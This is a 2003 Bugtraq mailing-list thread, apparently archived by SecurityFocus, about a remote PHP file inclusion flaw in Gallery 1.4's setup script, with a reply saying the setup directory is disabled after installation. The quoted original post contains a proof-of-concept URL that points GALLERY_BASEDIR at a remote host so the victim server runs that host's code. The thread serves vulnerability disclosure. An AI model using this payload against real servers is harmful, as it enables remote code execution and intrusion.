SecurityFocus

Gallery 1.4 including file vulnerability Oct 11 2003 04:13PM
Peter Stöckli (pcs rootquest com) (2 replies)

Re: Gallery 1.4 including file vulnerability Oct 12 2003 05:53AM
Bharat Mediratta (bharat menalto com)

RE: Gallery 1.4 including file vulnerability Oct 11 2003 06:41PM
Brent Meshier (brent meshier com)

The URL you mention is accessible only during the setup of Gallery.
Completing the installation, the user runs secure.sh or secure.bat which
"chmod 0 setup" making the vulnerability you mention inaccessible to the
web.

Brent Meshier
Global Transport Logistics, Inc.
2770 Fortune Circle Drive
Indianapolis, IN 46241
(317) 481-0527 x23 Direct
(317) 481-0177 Fax
http://www.gtlogistics.com/

-----Original Message-----
From: Peter Stöckli [mailto:pcs (at) rootquest (dot) com [email concealed]]
Sent: Saturday, October 11, 2003 11:13 AM
To: bugtraq (at) securityfocus (dot) com [email concealed]
Subject: Gallery 1.4 including file vulnerability

-Proof of concept-
It is possible to include any php file from a remote host, and execute
it on the target's server.
This works:
http://victim/path_to_gallery/setup/index.php?GALLERY_BASEDIR=http://tes

ter/
If the file "http://tester/util.php" exists, it will be included.

[ reply ]